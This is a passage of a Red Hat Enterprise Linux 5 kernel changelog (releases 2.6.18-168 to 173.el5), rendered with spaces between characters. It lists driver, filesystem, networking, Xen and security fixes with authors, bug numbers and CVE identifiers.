m s i - x c o r r e c t l y o n q l o g i c 2 x x x s e r i e s ( M a r c u s B a r r o w ) [ 5 3 1 5 9 3 ] b r > - [ a p i c ] f i x s e r v e r c 1 e s p u r i o u s l a p i c t i m e r e v e n t s ( B h a v n a S a r a t h y ) [ 5 1 9 4 2 2 ] b r > - [ p c i ] a e r : f i x p p c 6 4 c o m p i l e - n o m s i s u p p o r t ( P r a r i t B h a r g a v a ) [ 5 1 4 4 4 2 5 1 7 0 9 3 ] b r > - [ p c i ] a e r : c o n f i g c h a n g e s t o e n a b l e a e r s u p p o r t ( P r a r i t B h a r g a v a ) [ 5 1 4 4 4 2 5 1 7 0 9 3 ] b r > - [ p c i ] a e r : f i x N U L L p o i n t e r i n a e r i n j e c t i o n c o d e ( P r a r i t B h a r g a v a ) [ 5 1 4 4 4 2 5 1 7 0 9 3 ] b r > - [ p c i ] a e r : a d d d o m a i n s u p p o r t t o a e r _ i n j e c t ( P r a r i t B h a r g a v a ) [ 5 1 4 4 4 2 5 1 7 0 9 3 ] b r > - [ p c i ] a e r : b a c k p o r t a c p i o s c f u n c t i o n s ( P r a r i t B h a r g a v a ) [ 5 1 7 0 9 3 ] b r > - [ p c i ] a e r : p c i e s u p p o r t a n d c o m p i l e f i x e s ( P r a r i t B h a r g a v a ) [ 5 1 7 0 9 3 ] b r > - [ p c i ] a e r : c h a n g e s r e q u i r e d t o c o m p i l e i n R H E L 5 ( P r a r i t B h a r g a v a ) [ 5 1 4 4 4 2 5 1 7 0 9 3 ] b r > - [ p c i ] a e r : b a s e a e r d r i v e r s u p p o r t ( P r a r i t B h a r g a v a ) [ 5 1 4 4 4 2 5 1 7 0 9 3 ] b r > - [ k v m ] u s e u p s t r e a m k v m _ g e t _ t s c _ k h z ( G l a u b e r C o s t a ) [ 5 3 1 0 2 5 ] b r > - [ c i f s ] t u r n o p l o c k b r e a k s i n t o a w o r k q u e u e j o b ( J e f f L a y t o n ) [ 5 3 1 0 0 5 ] b r > - [ c i f s ] f i x o p l o c k r e q u e s t h a n d l i n g i n p o s i x c o d e p a t h ( J e f f L a y t o n ) [ 5 3 1 0 0 5 ] b r > - [ c i f s ] h a v e c i f s F i l e I n f o h o l d a n e x t r a i n o d e r e f e r e n c e ( J e f f L a y t o n ) [ 5 3 1 0 0 5 ] b r > - [ c i f s ] t a k e G l o b a l S M B S e s _ l o c k a s r e a d - o n l y ( J e f f L a y t o n ) [ 5 3 1 0 0 5 ] b r > - [ c i f s ] r e m o v e c i f s I n o d e I n f o . o p l o c k P e n d i n g f l a g ( J e f f L a y t o n ) [ 5 3 1 0 0 5 ] b r > - [ c i f s ] r e p l a c e w r t P e n d i n g w i t h a r e a l r e f e r e n c e c o u n t ( J e f f L a y t o n ) [ 5 3 1 0 0 5 ] b r > - [ c i f s ] c l e a n u p s e t _ c i f s _ a c l i n t e r f a c e s ( J e f f L a y t o n ) [ 5 3 1 0 0 5 ] b r > - [ c i f s ] r e o r g a n i z e g e t _ c i f s _ a c l ( J e f f L a y t o n ) [ 5 3 1 0 0 5 ] b r > - [ c i f s ] p r o t e c t G l o b a l O p l o c k _ Q w i t h i t s o w n s p i n l o c k ( J e f f L a y t o n ) [ 5 3 1 0 0 5 ] b r > - [ s c s i ] q l a 2 x x x : u p d a t e s a n d f i x e s f o r R H E L - 5 . 5 ( M a r c u s B a r r o w ) [ 5 1 9 4 4 7 ] b r > - [ n e t ] v l a n : s i l e n c e m u l t i c a s t d e b u g m e s s a g e s ( D a n n y F e n g ) [ 4 6 1 4 4 2 ] b r > - [ f s ] f i x i n o d e _ t a b l e t e s t i n e x t { 2 , 3 } _ c h e c k _ d e s c r i p t o r s ( E r i c S a n d e e n ) [ 5 0 4 7 9 7 ] b r > - [ n e t ] n e t l i n k : f i x t y p o i n i n i t i a l i z a t i o n ( J i r i P i r k o ) [ 5 2 7 9 0 6 ] b r > - [ m m ] p r e v e n t t m p f s f r o m g o i n g r e a d o n l y d u r i n g o o m k i l l s ( L a r r y W o o d m a n ) [ 4 9 7 2 5 7 ] b r > - [ x 8 6 ] s e t c p u _ l l c _ i d o n A M D C P U s ( B h a v n a S a r a t h y ) [ 5 1 3 6 8 4 ] b r > - [ x 8 6 ] f i x u p t h r e s h o l d _ b a n k 4 s u p p o r t o n A M D M a g n y - c o u r s ( B h a v n a S a r a t h y ) [ 5 1 3 6 8 4 ] b r > - [ x 8 6 ] f i x u p L 3 c a c h e i n f o r m a t i o n f o r A M D M a g n y - c o u r s ( B h a v n a S a r a t h y ) [ 5 1 3 6 8 4 ] b r > - [ x 8 6 ] a m d : f i x C P U l l c _ s h a r e d _ m a p i n f o r m a t i o n ( B h a v n a S a r a t h y ) [ 5 1 3 6 8 4 ] b r > - [ f s ] t r i m i n s t a n t i a t e d f i l e b l o c k s o n w r i t e e r r o r s ( E r i c S a n d e e n ) [ 5 1 5 5 2 9 ] b r > - [ s 3 9 0 ] o p t i m i z e s t o r a g e k e y o p e r a t i o n s f o r a n o n p a g e s ( H a n s - J o a c h i m P i c h t ) [ 5 1 9 9 7 7 ] b r > - [ n e t ] c x g b 3 : b u g f i x e s f r o m l a t e s t u p s t r e a m v e r s i o n ( D o u g L e d f o r d ) [ 5 1 0 8 1 8 ] b r > - [ m i s c ] s a n e r F A S Y N C h a n d l i n g o n f i l e c l o s e ( P a o l o B o n z i n i ) [ 5 1 0 7 4 6 ] b r > - [ w i r e l e s s ] m a c 8 0 2 1 1 : f i x r e p o r t e d w i r e l e s s e x t e n s i o n s v e r s i o n ( J o h n L i n v i l l e ) [ 5 1 3 4 3 0 ] b r > - [ m m ] d o n t o o m k i l l w h e n h u g e p a g e a l l o c f a i l s o n n o d e ( L a r r y W o o d m a n ) [ 4 9 8 5 1 0 ] b r > - [ x e n ] i o m m u - a m d : e x t e n d l o o p c t r f o r p o l l i n g c o m p l e t i o n w a i t ( B h a v n a S a r a t h y ) [ 5 1 8 4 7 4 5 2 6 7 6 6 ] b r > - [ x e n ] i o m m u : a d d p a s s t h r o u g h a n d n o - i n t r e m a p p a r a m e t e r s ( B h a v n a S a r a t h y ) [ 5 1 8 4 7 4 5 2 6 7 6 6 ] b r > - [ x e n ] i o m m u : e n a b l e a m d i o m m u d e b u g a t r u n - t i m e ( B h a v n a S a r a t h y ) [ 5 1 8 4 7 4 5 2 6 7 6 6 ] b r > - [ x e n ] s u p p o r t i n t e r r u p t r e m a p p i n g o n M - C ( B h a v n a S a r a t h y ) [ 5 1 8 4 7 4 5 2 6 7 6 6 ] b r > - [ x e n ] i o m m u : m o v e i o m m u _ s e t u p ( ) t o s e t u p i o a p i c c o r r e c t l y ( B h a v n a S a r a t h y ) [ 5 1 8 4 7 4 5 2 6 7 6 6 ] b r > b r > [ 2 . 6 . 1 8 - 1 7 3 . e l 5 ] b r > - [ a c p i ] t h i n k p a d _ a c p i : d i s a b l e e c n v r a m b r i g h t n e s s o n s o m e ( M a t t h e w G a r r e t t ) [ 5 2 2 7 4 5 ] b r > - [ b l o c k ] c f q - i o s c h e d : d o n t d e l a y q u e u e k i c k f o r m e r g e d r e q ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ b l o c k ] c f q - i o s c h e d : f i x i d l i n g i n t e r f e r i n g w i t h p l u g g i n g ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ b l o c k ] c f q : s e p a r a t e m e r g e d c f q q s i f t h e y s t o p c o o p e r a t i n g ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ b l o c k ] c f q : c h a n g e t h e m e a n i n g o f t h e c f q q _ c o o p f l a g ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ b l o c k ] c f q : m e r g e c o o p e r a t i n g c f q _ q u e u e s ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ b l o c k ] c f q : c a l c s e e k _ m e a n p e r c f q _ q u e u e n o t p e r c f q _ i o _ c o n t e x t ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ b l o c k ] c f q - i o s c h e d : c a c h e p r i o _ t r e e r o o t i n c f q q - > p _ r o o t ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ b l o c k ] c f q - i o s c h e d : f i x a l i a s e d r e q & c o o p e r a t i o n d e t e c t ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ b l o c k ] c f q - i o s c h e d : d e f a u l t s e e k w h e n n o t e n o u g h s a m p l e s ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ b l o c k ] c f q - i o s c h e d : m a k e s e e k _ m e a n c o n v e r g e m o r e q u i c k ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ b l o c k ] c f q - i o s c h e d : a d d c l o s e c o o p e r a t o r c o d e ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ b l o c k ] c f q - i o s c h e d : d e v e l o p m e n t u p d a t e ( J e f f M o y e r ) [ 4 5 6 1 8 1 4 4 8 1 3 0 4 2 7 7 0 9 ] b r > - [ g f s 2 ] c a r e f u l u n l i n k i n g i n o d e s ( S t e v e n W h i t e h o u s e ) [ 5 1 9 0 4 9 ] b r > - [ s c s i ] a r c m s r : a d d m i s s i n g p a r a m e t e r ( T o m a s H e n z l ) [ 5 2 1 2 0 3 ] b r > - [ n f s ] v 4 : f i x s e t t i n g l o c k o n o p e n f i l e w i t h n o s t a t e ( J e f f L a y t o n ) [ 5 3 3 1 1 5 ] { C V E - 2 0 0 9 - 3 7 2 6 } b r > - [ m i s c ] f u t e x p r i o r i t y b a s e d w a k e u p ( J o n T h o m a s ) [ 5 3 1 5 5 2 ] b r > - [ d l m ] u s e G F P _ N O F S o n a l l l o c k s p a c e s ( D a v i d T e i g l a n d ) [ 5 3 0 5 3 7 ] b r > - [ g f s 2 ] i m p r o v e s t a t f s a n d q u o t a u s a b i l i t y ( B e n j a m i n M a r z i n s k i ) [ 5 2 9 7 9 6 ] b r > - [ n e t ] f o r c e d e t h : l e t p h y p o w e r d o w n w h e n I F i s d o w n ( I v a n V e c e r a ) [ 5 1 3 6 9 2 ] b r > - [ d r m ] r 1 2 8 : c h e c k f o r i n i t o n a l l i o c t l s t h a t r e q u i r e i t ( D a n n y F e n g ) [ 5 2 9 6 0 3 ] { C V E - 2 0 0 9 - 3 6 2 0 } b r > - [ s c s i ] h t p i o p : R o c k e t R A I D d r i v e r u p d a t e v 1 . 0 - > v 1 . 6 ( R o b E v e r s ) [ 5 1 9 0 7 6 ] b r > - [ i p m i ] a d d H P m e s s a g e h a n d l i n g ( T o n y C a m u s o ) [ 5 0 7 4 0 2 ] b r > - [ m m ] p r e v e n t h a n g s / l o n g p a u s e s w h e n z o n e _ r e c l a i m _ m o d e = 1 ( L a r r y W o o d m a n ) [ 5 0 7 3 6 0 ] b r > - [ s 3 9 0 ] i p l : v m h a l t , v m p a n i c , v m p o f f , v m r e b o o t d o n t w o r k ( H a n s - J o a c h i m P i c h t ) [ 5 1 8 2 2 9 ] b r > - [ n f s ] b r i n g p u t p u b f h h a n d l i n g i n l i n e w i t h u p s t r e a m ( W a d e M e a l i n g ) [ 5 1 5 4 0 5 ] b r > b r > [ 2 . 6 . 1 8 - 1 7 2 . e l 5 ] b r > - [ f s ] d i o : d o n t z e r o o u t p a g e s a r r a y i n s i d e s t r u c t d i o ( J e f f M o y e r ) [ 4 8 8 1 6 1 ] b r > - [ c i f s ] l i b f s : s b - > s _ m a x b y t e s c a s t s t o a s i g n e d v a l u e ( J e f f L a y t o n ) [ 4 8 6 0 9 2 ] b r > - [ s e r i a l ] p o w e r 7 : s u p p o r t t h e s i n g l e - p o r t s e r i a l d e v i c e ( K e v i n M o n r o e ) [ 5 2 5 8 1 2 ] b r > - [ k A B I ] a d d p c i _ { e n a b l e , d i s a b l e } _ m s i { , x } ( J o n M a s t e r s ) [ 5 2 1 0 8 1 ] b r > - [ s c s i ] m p t : e r r a t a 2 8 f i x o n L S I 5 3 C 1 0 3 0 ( T o m a s H e n z l ) [ 5 1 8 6 8 9 ] b r > - [ s c s i ] p a n i c a t . i p r _ s a t a _ r e s e t a f t e r d e v i c e r e s e t ( K e v i n M o n r o e ) [ 5 2 8 1 7 5 ] b r > - [ s c s i ] l p f c : u p d a t e t o 8 . 2 . 0 . 5 2 F C / F C o E ( R o b E v e r s ) [ 5 1 5 2 7 2 ] b r > - [ x 8 6 ] a d d a b i l i t y t o a c c e s s N e h a l e m u n c o r e c o n f i g s p a c e ( J o h n V i l l a l o v o s ) [ 5 0 4 3 3 0 ] b r > - [ n e t ] s u n r p c : r e m o v e f l u s h _ w o r k q u e u e f r o m x s _ c o n n e c t ( J e f f L a y t o n ) [ 4 9 5 0 5 9 ] b r > - [ x e n ] i a 6 4 : c o m m a n d - l i n e a r g t o i n c r e a s e t h e h e a p s i z e ( P a o l o B o n z i n i ) [ 5 2 1 8 6 5 ] b r > b r > [ 2 . 6 . 1 8 - 1 7 1 . e l 5 ] b r > - [ s e c u r i t y ] r e q u i r e r o o t f o r m m a p _ m i n _ a d d r ( E r i c P a r i s ) [ 5 1 8 1 4 3 ] { C V E - 2 0 0 9 - 2 6 9 5 } b r > - [ a t a ] a h c i : a d d A M D S B 9 0 0 c o n t r o l l e r d e v i c e I D s ( D a v i d M i l b u r n ) [ 5 1 5 1 1 4 ] b r > - [ n e t ] l v s : a d j u s t s y n c p r o t o c o l h a n d l i n g f o r i p v s a d m - 2 ( N e i l H o r m a n ) [ 5 2 4 1 2 9 ] b r > - R e v e r t : [ n e t ] l v s : f i x s y n c p r o t o c o l h a n d l i n g f o r t i m e o u t v a l u e s ( N e i l H o r m a n ) [ 5 2 4 1 2 9 ] b r > - [ n e t ] A F _ U N I X : d e a d l o c k o n c o n n e c t i n g t o s h u t d o w n s o c k e t ( J i r i P i r k o ) [ 5 2 9 6 3 1 ] { C V E - 2 0 0 9 - 3 6 2 1 } b r > - [ f s ] i n o t i f y : r e m o v e d e b u g c o d e ( D a n n y F e n g ) [ 4 9 9 0 1 9 ] b r > - [ f s ] i n o t i f y : f i x r a c e ( D a n n y F e n g ) [ 4 9 9 0 1 9 ] b r > b r > [ 2 . 6 . 1 8 - 1 7 0 . e l 5 ] b r > - [ n e t ] l v s : f i x s y n c p r o t o c o l h a n d l i n g f o r t i m e o u t v a l u e s ( N e i l H o r m a n ) [ 5 2 4 1 2 9 ] b r > - [ n e t ] i g b : r e t u r n P C I _ E R S _ R E S U L T _ D I S C O N N E C T o n f a i l u r e ( D e a n N e l s o n ) [ 5 1 4 2 5 0 ] b r > - [ n e t ] e 1 0 0 : r e t u r n P C I _ E R S _ R E S U L T _ D I S C O N N E C T o n f a i l u r e ( D e a n N e l s o n ) [ 5 1 4 2 5 0 ] b r > - [ n f s ] k n f s d : q u e r y f s f o r v 4 g e t a t t r o f F A T T R 4 _ M A X N A M E ( J e f f L a y t o n ) [ 4 6 9 6 8 9 ] b r > - [ b l o c k ] b l k f r o n t : r e s p e c t e l e v a t o r = x y z c m d l i n e o p t i o n ( P a o l o B o n z i n i ) [ 4 9 8 4 6 1 ] b r > - [ f i r e w i r e ] f w - o h c i : f i x I O M M U r e s o u r c e e x h a u s t i o n ( J a y F e n l a s o n ) [ 5 1 3 8 2 7 ] b r > - [ s c s i ] c c i s s : i g n o r e s t a l e c o m m a n d s a f t e r r e b o o t ( T o m a s H e n z l ) [ 5 2 5 4 4 0 ] b r > - [ s c s i ] c c i s s : v e r s i o n c h a n g e ( T o m a s H e n z l ) [ 5 2 5 4 4 0 ] b r > - [ s c s i ] c c i s s : s w i t c h t o u s i n g h l i s t ( T o m a s H e n z l ) [ 5 2 5 4 4 0 ] b r > - [ x 8 6 ] s u p p o r t a l w a y s r u n n i n g L o c a l A P I C ( J o h n V i l l a l o v o s ) [ 4 9 6 3 0 6 ] b r > - [ x 8 6 _ 6 4 ] f i x h u g e p a g e m e m o r y t r a c k i n g ( J i m P a r a d i s ) [ 5 1 8 6 7 1 ] b r > - [ n e t ] b n x 2 : a p p l y B R O K E N _ S T A T S w o r k a r o u n d t o 5 7 0 6 / 5 7 0 8 ( F l a v i o L e i t n e r ) [ 5 2 7 7 4 8 ] b r > - [ p c i ] p c i _ d e v - > i s _ e n a b l e d m u s t b e s e t ( P r a r i t B h a r g a v a ) [ 5 2 7 4 9 6 ] b r > - [ a u d i t ] d e r e f e r e n c i n g k r u l e a s i f i t w e r e a n a u d i t _ w a t c h ( A l e x a n d e r V i r o ) [ 5 2 6 8 1 9 ] b r > - [ m m ] f i x s p i n l o c k p e r f o r m a n c e i s s u e o n l a r g e s y s t e m s ( J o h n V i l l a l o v o s ) [ 5 2 6 0 7 8 ] b r > - [ m i s c ] h o t p l u g : a d d C P U _ D Y I N G n o t i f i e r ( E d u a r d o H a b k o s t ) [ 5 1 0 8 1 4 ] b r > - [ m i s c ] h o t p l u g : u s e c p u s e t h o t p l u g c a l l b a c k t o C P U _ D Y I N G ( E d u a r d o H a b k o s t ) [ 5 1 0 8 1 4 ] b r > - [ m i s c ] d e f i n e C P U _ D Y I N G a n d C P U _ D Y I N G _ F R O Z E N ( E d u a r d o H a b k o s t ) [ 5 1 0 8 1 4 ] b r > - [ m i s c ] h o t p l u g : a d a p t t h e r m a l t h r o t t l e t o C P U _ D Y I N G ( E d u a r d o H a b k o s t ) [ 5 1 0 8 1 4 ] b r > - [ f s ] f i l e t r u n c a t i o n s w h e n b o t h s u i d a n d w r i t e p e r m s s e t ( A m e r i g o W a n g ) [ 4 8 6 9 7 5 ] b r > - [ x 8 6 ] f i n i s h s y s d a t a c o n v e r s i o n ( D a n n y F e n g ) [ 5 1 9 6 3 3 ] b r > - [ m i s c ] p i p e : f i x f d l e a k s ( A m e r i g o W a n g ) [ 5 0 9 6 2 5 ] b r > - [ x 8 6 _ 6 4 ] P C I s p a c e b e l o w 4 G B f o r c e s m e m r e m a p a b o v e 1 T B ( L a r r y W o o d m a n ) [ 5 2 3 5 2 2 ] b r > - [ p c i ] p c i e h p : f i x P C I e h o t p l u g s l o t d e t e c t i o n ( M i c h a l S c h m i d t ) [ 5 2 1 7 3 1 ] b r > - [ n e t ] s y n c o o k i e s : s u p p o r t f o r T C P o p t i o n s v i a t i m e s t a m p s ( j o l s a @ r e d h a t . c o m ) [ 5 0 9 0 6 2 ] b r > - [ n e t ] t c p : a d d I P v 6 s u p p o r t t o T C P S Y N c o o k i e s ( j o l s a @ r e d h a t . c o m ) [ 5 0 9 0 6 2 ] b r > - [ x e n ] b l k f r o n t : c h e c k f o r o u t - o f - b o u n d s a r r a y a c c e s s e s ( P a o l o B o n z i n i ) [ 5 1 7 2 3 8 ] b r > - [ x e n ] f i x t i m e o u t w i t h P V g u e s t a n d p h y s i c a l C D R O M ( P a o l o B o n z i n i ) [ 5 0 6 8 9 9 ] b r > - [ n e t ] e 1 0 0 0 e : r e t u r n P C I _ E R S _ R E S U L T _ D I S C O N N E C T o n f a i l ( D e a n N e l s o n ) [ 5 0 8 3 8 7 ] b r > - [ x 8 6 _ 6 4 ] v s m p : f i x b i t - w i s e o p e r a t o r a n d c o m p i l e i s s u e ( P r a r i t B h a r g a v a ) [ 5 1 5 4 0 8 ] b r > - [ n e t ] e 1 0 0 : a d d s u p p o r t f o r 8 2 5 5 2 ( D e a n N e l s o n ) [ 4 7 5 6 1 0 ] b r > - [ n e t ] n e t f i l t e r : h o n o u r s o u r c e r o u t i n g f o r L V S - N A T ( J i r i P i r k o ) [ 4 9 1 0 1 0 ] b r > - [ m i s c ] h w m o n : u p d a t e t o l a t e s t u p s t r e a m f o r R H E L - 5 . 5 ( P r a r i t B h a r g a v a ) [ 4 6 7 9 9 4 2 5 0 5 6 1 4 4 6 0 6 1 ] b r > - [ x e n ] p a n i c i n m s i _ m s g _ r e a d _ r e m a p _ r t e w i t h a c p i = o f f ( M i r o s l a v R e z a n i n a ) [ 5 2 5 4 6 7 ] b r > - [ x e n ] m a s k o u t x s a v e f o r h v m g u e s t s ( A n d r e w J o n e s ) [ 5 2 4 0 5 2 ] b r > - [ x e n ] a l l o w b o o t i n g w i t h b r o k e n s e r i a l h a r d w a r e ( C h r i s L a l a n c e t t e ) [ 5 1 8 3 3 8 ] b r > - [ x e n ] m a s k o u t m o r e C P U I D b i t s f o r P V g u e s t s ( C h r i s L a l a n c e t t e ) [ 5 0 2 8 2 6 ] b r > - [ x e n ] x 8 6 : f i x w r o n g a s m ( P a o l o B o n z i n i ) [ 5 1 0 6 8 6 ] b r > - [ x e n ] a l w a y s i n l i n e m e m c m p ( P a o l o B o n z i n i ) [ 5 1 0 6 8 6 ] b r > - [ x e n ] i 3 8 6 : h a n d l e x 8 7 o p c o d e s i n T L S s e g m e n t f i x u p ( P a o l o B o n z i n i ) [ 5 1 0 2 2 5 ] b r > b r > [ 2 . 6 . 1 8 - 1 6 9 . e l 5 ] b r > - [ s c s i ] e x p o r t s y m b o l s c s i l u n _ t o _ i n t ( T o m a s H e n z l ) [ 5 2 8 1 5 3 ] b r > - [ f s ] e C r y p t f s : p r e v e n t l o w e r d e n t r y f r o m g o i n g n e g a t i v e ( E r i c S a n d e e n ) [ 5 2 7 8 3 5 ] { C V E - 2 0 0 9 - 2 9 0 8 } b r > - [ n f s ] v 4 : r e c l a i m e r t h r e a d s t u c k i n a n i n f i n i t e l o o p ( S a c h i n S . P r a b h u ) [ 5 2 6 8 8 8 ] b r > - [ s c s i ] s c s i _ d h _ r d a c : c h a n g e s f o r r d a c d e b u g l o g g i n g ( R o b E v e r s ) [ 5 2 4 3 3 5 ] b r > - [ s c s i ] s c s i _ d h _ r d a c : c o l l e c t r d a c d e b u g i n f o d u r i n g i n i t ( R o b E v e r s ) [ 5 2 4 3 3 5 ] b r > - [ s c s i ] s c s i _ d h _ r d a c : m o v e i n i t c o d e a r o u n d ( R o b E v e r s ) [ 5 2 4 3 3 5 ] b r > - [ s c s i ] s c s i _ d h _ r d a c : r e t u r n c o r r e c t m o d e s e l e c t c m d i n f o ( R o b E v e r s ) [ 5 2 4 3 3 5 ] b r > - [ s c s i ] s c s i _ d h _ r d a c : a d d s u p p o r t f o r D e l l P V a r r a y ( R o b E v e r s ) [ 5 2 4 3 3 5 ] b r > - [ s c s i ] s c s i _ d h _ r d a c : a d d s u p p o r t f o r S U N d e v i c e s ( R o b E v e r s ) [ 5 2 4 3 3 5 ] b r > - [ s c s i ] s c s i _ d h _ r d a c : s u p p o r t S T 2 5 0 0 , S T 2 5 1 0 a n d S T 2 5 3 0 ( R o b E v e r s ) [ 5 2 4 3 3 5 ] b r > - [ s 3 9 0 ] c i o : b o o t t h r o u g h X A U T O L O G w i t h c o n m o d e 3 2 7 0 ( H a n s - J o a c h i m P i c h t ) [ 5 0 8 9 3 4 ] b r > - [ x 8 6 ] a d d s m p _ c a l l _ f u n c t i o n _ m a n y / s i n g l e f u n c t i o n s ( P r a r i t B h a r g a v a ) [ 5 2 6 0 4 3 ] b r > - [ s 3 9 0 ] i u c v : f i x o u t p u t r e g i s t e r i n i u c v _ q u e r y _ m a x c o n n ( H a n s - J o a c h i m P i c h t ) [ 5 2 4 2 5 1 ] b r > - [ s 3 9 0 ] s e t p r e f e r r e d s 3 9 0 c o n s o l e b a s e d o n c o n m o d e ( H a n s - J o a c h i m P i c h t ) [ 5 2 0 4 6 1 ] b r > - [ s 3 9 0 ] d a s d : a d d l a r g e v o l u m e s u p p o r t ( H a n s - J o a c h i m P i c h t ) [ 5 1 1 9 7 2 ] b r > - [ s 3 9 0 ] d a s d : f a i l r e q u e s t s w h e n d e v s t a t e i s n o t r e a d y ( H a n s - J o a c h i m P i c h t ) [ 5 2 3 2 1 9 ] b r > - [ s 3 9 0 ] c i o : f a i l i n g s e t o n l i n e / o f f l i n e p r o c e s s i n g ( H a n s - J o a c h i m P i c h t ) [ 5 2 3 3 2 3 ] b r > - [ x 8 6 ] o p r o f i l e : s u p p o r t a r c h p e r f m o n ( J o h n V i l l a l o v o s ) [ 5 2 3 4 7 9 ] b r > - [ x 8 6 ] o p r o f i l e : f i x K 8 / c o r e 2 o n m u l t i p l e c p u s ( J o h n V i l l a l o v o s ) [ 5 2 3 4 7 9 ] b r > - [ x 8 6 ] o p r o f i l e : u t i l i z e p e r f c o u n t e r r e s e r v a t i o n ( J o h n V i l l a l o v o s ) [ 5 2 3 4 7 9 ] b r > - [ g f s 2 ] g e n e s i s s t u c k w r i t i n g t o u n l i n k e d f i l e ( A b h i j i t h D a s ) [ 5 0 5 3 3 1 ] b r > - [ n e t ] r 8 1 6 9 : a v o i d l o s i n g M S I i n t e r r u p t s ( I v a n V e c e r a ) [ 5 1 4 5 8 9 ] b r > - [ s 3 9 0 ] c i o : s e t c o r r e c t n u m b e r o f i n t e r n a l I / O r e t r i e s ( H a n s - J o a c h i m P i c h t ) [ 5 1 9 8 1 4 ] b r > - [ n e t ] e 1 0 0 0 : r e t u r n P C I _ E R S _ R E S U L T _ D I S C O N N E C T o n f a i l ( D e a n N e l s o n ) [ 5 0 8 3 8 9 ] b r > - [ n e t ] i x g b e : r e t u r n P C I _ E R S _ R E S U L T _ D I S C O N N E C T o n f a i l ( D e a n N e l s o n ) [ 5 0 8 3 8 8 ] b r > - [ c r y p t o ] s 3 9 0 : e n a b l e a n s i _ c p r n g c o n f i g o p t i o n ( J a r o d W i l s o n ) [ 5 0 4 6 6 7 ] b r > - [ s 3 9 0 ] d a s d : d e v a t t r t o d i s a b l e b l o c k i n g o n l o s t p a t h s ( H a n s - J o a c h i m P i c h t ) [ 5 0 3 2 2 2 ] b r > - [ s 3 9 0 ] q e t h : h a n d l e V S w i t c h P o r t I s o l a t i o n e r r o r c o d e s ( H a n s - J o a c h i m P i c h t ) [ 5 0 3 2 3 2 ] b r > - [ s 3 9 0 ] q e t h : i m p r o v e n o _ c h e c k s u m m i n g h a n d l i n g f o r l a y e r 3 ( H a n s - J o a c h i m P i c h t ) [ 5 0 3 2 3 8 ] b r > - [ g f s 2 ] s m b d p r o c c e s s h a n g s w i t h f l o c k c a l l ( A b h i j i t h D a s ) [ 5 0 2 5 3 1 ] b r > - [ i n p u t ] p s m o u s e : r e e n a b l e m o u s e o n s h u t d o w n ( P r a r i t B h a r g a v a ) [ 5 0 1 0 2 5 ] b r > - [ x e n ] x 8 6 : m a k e N M I d e t e c t i o n w o r k ( M i r o s l a v R e z a n i n a ) [ 4 9 4 1 2 0 ] b r > b r > [ 2 . 6 . 1 8 - 1 6 8 . e l 5 ] b r > - [ g f s 2 ] m o u n t o p t i o n : - o e r r o r s = w i t h d r a w | p a n i c ( B o b P e t e r s o n ) [ 5 1 8 1 0 6 ] b r > - [ n e t ] b o n d i n g : s e t p r i m a r y p a r a m v i a s y s f s ( J i r i P i r k o ) [ 4 9 9 8 8 4 ] b r > - [ s c s i ] f u s i o n : r e - e n a b l e m p t _ m s i _ e n a b l e o p t i o n ( T o m a s H e n z l ) [ 5 2 0 8 2 0 ] b r > - [ x 8 6 ] x e n : a d d ' i d a ' f l a g ( P r a r i t B h a r g a v a ) [ 5 2 2 8 4 6 ] b r > - [ n e t ] i p t _ r e c e n t : s a n i t y c h e c k h i t c o u n t ( A m e r i g o W a n g ) [ 5 2 3 9 8 2 ] b r > - [ a c p i ] f i x s y n t a x i n A C P I d e b u g s t a t e m e n t ( S t e f a n A s s m a n n ) [ 5 2 4 7 8 7 ] b r > - [ s 3 9 0 ] A F _ I U C V S O C K _ S E Q P A C K E T s u p p o r t ( H a n s - J o a c h i m P i c h t ) [ 5 1 2 0 0 6 ] b r > - [ x 8 6 ] f i x n o s m p o p t i o n ( P r a r i t B h a r g a v a ) [ 5 0 9 5 8 1 ] b r > - [ n f s ] n f s d 4 : i d m a p u p c a l l s s h o u l d u s e u n s i g n e d u i d / g i d ( J e f f L a y t o n ) [ 5 1 9 1 8 4 ] b r > - [ i a 6 4 ] f i x p p o l l a n d p s e l e c t s y s c a l l s ( P r a r i t B h a r g a v a ) [ 5 2 0 8 6 7 ] b r > - [ n e t ] i p v 4 : i p _ a p p e n d _ d a t a h a n d l e N U L L r o u t i n g t a b l e ( J i r i P i r k o ) [ 5 2 0 2 9 7 ] b r > - [ n e t ] f i x d r o p m o n i t o r t o n o t p a n i c o n n u l l d e v ( N e i l H o r m a n ) [ 5 2 3 2 7 9 ] b r > - [ g f s 2 ] g f s 2 _ d e l e t e _ i n o d e f a i l i n g o n R O f i l e s y s t e m ( A b h i j i t h D a s ) [ 5 0 1 3 5 9 ] b r > - [ n f s ] s t a t f s e r r o r - h a n d l i n g f i x ( J e f f L a y t o n ) [ 5 1 9 1 1 2 ] b r > - [ p c i ] a v o i d d i s a b l i n g a c p i t o u s e n o n - c o r e P C I d e v i c e s ( M a u r o C a r v a l h o C h e h a b ) [ 5 0 4 3 3 0 ] b r > - [ n f s ] f i x r e g r e s s i o n i n n f s _ o p e n _ r e v a l i d a t e ( J e f f L a y t o n ) [ 5 1 1 2 7 8 ] b r > - [ n f s ] f i x c a c h e i n v a l i d a t i o n p r o b l e m s i n n f s _ r e a d d i r ( J e f f L a y t o n ) [ 5 1 1 1 7 0 ] b r > - [ f s ] s a n i t i z e i n v a l i d p a r t i t i o n t a b l e e n t r i e s ( S t e f a n A s s m a n n ) [ 4 8 1 